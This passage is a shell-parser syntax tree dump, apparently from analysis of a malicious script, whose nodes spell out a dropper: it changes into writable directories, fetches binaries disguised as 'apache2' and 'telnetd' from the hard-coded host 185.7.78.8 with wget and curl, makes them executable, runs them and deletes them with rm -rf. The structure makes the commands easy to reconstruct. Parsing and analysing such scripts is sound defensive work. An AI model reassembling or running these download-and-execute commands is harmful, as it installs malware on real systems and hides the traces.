  CommandNode(lineno=13, pos=(1755, 1788), parts=[
    WordNode(lineno=13, pos=(1755, 1759), word='curl'),
    WordNode(lineno=13, pos=(1760, 1762), word='-O'),
    WordNode(lineno=13, pos=(1763, 1788), word='http://185.7.78.8/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1788, 1789)),
  CommandNode(lineno=13, pos=(1790, 1806), parts=[
    WordNode(lineno=13, pos=(1790, 1795), word='chmod'),
    WordNode(lineno=13, pos=(1796, 1798), word='+x'),
    WordNode(lineno=13, pos=(1799, 1806), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1806, 1807)),
  CommandNode(lineno=13, pos=(1808, 1817), parts=[
    WordNode(lineno=13, pos=(1808, 1817), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1817, 1818)),
  CommandNode(lineno=13, pos=(1819, 1833), parts=[
    WordNode(lineno=13, pos=(1819, 1821), word='rm'),
    WordNode(lineno=13, pos=(1822, 1825), word='-rf'),
    WordNode(lineno=13, pos=(1826, 1833), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1834, 1999), parts=[
  CommandNode(lineno=14, pos=(1834, 1841), parts=[
    WordNode(lineno=14, pos=(1834, 1836), word='cd'),
    WordNode(lineno=14, pos=(1837, 1841), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1842, 1844)),
  CommandNode(lineno=14, pos=(1845, 1856), parts=[
    WordNode(lineno=14, pos=(1845, 1847), word='cd'),
    WordNode(lineno=14, pos=(1848, 1856), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1857, 1859)),
  CommandNode(lineno=14, pos=(1860, 1867), parts=[
    WordNode(lineno=14, pos=(1860, 1862), word='cd'),
    WordNode(lineno=14, pos=(1863, 1867), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1868, 1870)),
  CommandNode(lineno=14, pos=(1871, 1879), parts=[
    WordNode(lineno=14, pos=(1871, 1873), word='cd'),
    WordNode(lineno=14, pos=(1874, 1879), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1880, 1882)),
  CommandNode(lineno=14, pos=(1883, 1887), parts=[
    WordNode(lineno=14, pos=(1883, 1885), word='cd'),
    WordNode(lineno=14, pos=(1886, 1887), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1887, 1888)),
  CommandNode(lineno=14, pos=(1889, 1919), parts=[
    WordNode(lineno=14, pos=(1889, 1893), word='wget'),
    WordNode(lineno=14, pos=(1894, 1919), word='http://185.7.78.8/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1919, 1920)),
  CommandNode(lineno=14, pos=(1921, 1954), parts=[
    WordNode(lineno=14, pos=(1921, 1925), word='curl'),
    WordNode(lineno=14, pos=(1926, 1928), word='-O'),
    WordNode(lineno=14, pos=(1929, 1954), word='http://185.7.78.8/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1954, 1955)),
  CommandNode(lineno=14, pos=(1956, 1972), parts=[
    WordNode(lineno=14, pos=(1956, 1961), word='chmod'),
    WordNode(lineno=14, pos=(1962, 1964), word='+x'),
    WordNode(lineno=14, pos=(1965, 1972), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1972, 1973)),
  CommandNode(lineno=14, pos=(1974, 1983), parts=[
    WordNode(lineno=14, pos=(1974, 1983), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1983, 1984)),
  CommandNode(lineno=14, pos=(1985, 1999), parts=[
    WordNode(lineno=14, pos=(1985, 1987), word='rm'),
    WordNode(lineno=14, pos=(1988, 1991), word='-rf'),
    WordNode(lineno=14, pos=(1992, 1999), word='telnetd'),
  ]),
])
